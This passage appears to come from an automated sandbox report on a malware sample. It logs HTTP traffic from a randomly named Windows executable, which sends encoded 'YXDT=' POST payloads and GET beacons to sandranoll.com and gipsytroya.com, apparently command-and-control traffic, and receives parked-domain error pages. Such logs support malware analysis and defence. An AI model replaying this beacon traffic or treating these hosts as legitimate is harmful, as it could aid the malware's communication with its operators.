37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 68 2b 69 75 6e 4a 59 55 47 32 35 56 71 77 38 4b 4c 6b 2b 69 4e 53 61 33 51 58 4a 42 42 30 4b 41 49 3d Data Ascii: YXDT=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwh+iunJYUG25Vqw8KLk+iNSa3QXJBB0KAI=
Aug 12, 2024 05:15:58.646765947 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:15:58 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 12, 2024 05:15:58.646795988 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">86e<table><tr><td><ta
Aug 12, 2024 05:15:58.646817923 CEST	1149	IN	Data Raw: 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 Data Ascii: /tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px;" src="https://www.domaintechnik.at/fileadmin/pics/30-Tage.gif" alt="Hosting" /></td><td style="width:300px;">Vom Einsteigerpaket Profi Server
Aug 12, 2024 05:15:58.650124073 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49766	213.145.228.16	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:00.497010946 CEST	10876	OUT	POST /aroo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sandranoll.com Origin: http://www.sandranoll.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.sandranoll.com/aroo/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 36 53 4d 61 6f 76 42 30 2b 2f 33 6d 68 68 31 4d 36 7a 55 6e 4b 50 79 55 6d 71 79 4b 62 63 69 41 4a 46 53 77 42 42 51 44 68 48 58 47 71 30 53 53 48 44 71 62 4a 64 41 73 31 59 78 53 51 6a 74 32 78 4d 4c 6f 71 35 75 6c 36 54 73 62 37 44 4e 45 74 6e 4b 58 62 38 68 72 50 54 4a 35 61 75 45 4c 46 52 31 6c 32 6e 48 55 62 52 66 2b 37 54 56 76 42 4a 38 35 78 2f 4c 58 6b 6e 4f 52 41 4b 63 38 75 73 51 42 32 6d 79 36 6a 42 33 4f 4f 6d 41 6d 65 77 51 75 34 36 39 5a 73 63 50 47 78 43 46 4a 4a 30 5a [TRUNCATED] Data Ascii: YXDT=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI6SMaovB0+/3mhh1M6zUnKPyUmqyKbciAJFSwBBQDhHXGq0SSHDqbJdAs1YxSQjt2xMLoq5ul6Tsb7DNEtnKXb8hrPTJ5auELFR1l2nHUbRf+7TVvBJ85x/LXknORAKc8usQB2my6jB3OOmAmewQu469ZscPGxCFJJ0ZaSUSbYS9mNWDQskxIqkVMN/xQd5Fuo65yYaH/k1IDUF/6h0//CqVSpR3EF1wEzYDSnHqwpwFyOZ8HVoSX21Q/aUYy4hK8P40IlK64nTfBzIiIPaC9rAVF9sbPwFIirOjON2AeynqgZYHiNGGAEbUFyS4FwXACLgv+DxYxKSQdJM7tLVuE4x3lqgXUMyeLjFhS2UFFJMsIfuVUc/F0IvX6nvOYRYoai/j/9Njkil3cZo0XUCAszLSVoGSqZmsJAUfLQ4Di+qUYzL1vCv9qX+bYJi/KMR2rQkmDq8FOIJ7jS1Aw7R2X6CY96d3BRnAD6UBPigfN+TB3Z5BgzLZkBz5ndMhfh2HT7v11upi5YwddLq+oj3tSjwTJTnSpxwY8dv+deJyN3fjDUKN8WrLhQ9dosHSqcsUY5nsqSHIUsKfSmZ57o2KdqIIrXzb0dVPgS/jHn4YOpGv3VaJOeayEP0jo9/Z5Vj1BqVrTJZ7z1Y+93BxC4cyPbmOqmxxkRHBPyI6m1kdLM6P4K14/5gi4sToR/pHXDFa9g31MJeIhpZn2xIMybVxidWwKlQXlxnyi87y99DrnJkFkTicYzp09pxdPibsTPWuGIrMowUFC7AkJcU6VegnjSwLN9Zx0nRVRt6eHuGwapmD3tFoNWaQj3zncN8bLIawM82V8s [TRUNCATED]
Aug 12, 2024 05:16:01.197101116 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:16:01 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: ce6<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 12, 2024 05:16:01.197151899 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Aug 12, 2024 05:16:01.197191000 CEST	1108	IN	Data Raw: 6e 3d 22 32 22 3e 3c 68 32 3e 54 79 70 6f 20 33 20 43 4d 53 20 48 6f 73 74 69 6e 67 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 Data Ascii: n="2"><h2>Typo 3 CMS Hosting</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png" alt="Typo3" /></td><td style="width:300px;">Typ
Aug 12, 2024 05:16:01.200086117 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49767	213.145.228.16	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:03.025938988 CEST	502	OUT	GET /aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.sandranoll.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:16:04.076773882 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:16:03 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 64 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED] Data Ascii: d1d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
Aug 12, 2024 05:16:04.076831102 CEST	1236	IN	Data Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
Aug 12, 2024 05:16:04.076870918 CEST	1163	IN	Data Raw: 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 Data Ascii: le="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png" alt="Reseller" /></td><td style="width:300px;">Als Web Hosting und Domain Reseller nutzen Sie unsere L
Aug 12, 2024 05:16:04.079963923 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49768	91.195.240.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:09.142751932 CEST	774	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 72 33 51 6f 75 6c 75 53 52 53 43 32 72 47 68 71 41 71 43 46 56 67 67 6c 37 78 72 47 6b 34 65 41 67 3d 3d Data Ascii: YXDT=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
Aug 12, 2024 05:16:09.777957916 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 03:16:09 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49769	91.195.240.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:11.686892986 CEST	794	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d Data Ascii: YXDT=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
Aug 12, 2024 05:16:12.319983959 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 03:16:12 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49770	91.195.240.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:14.222965002 CEST	10876	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 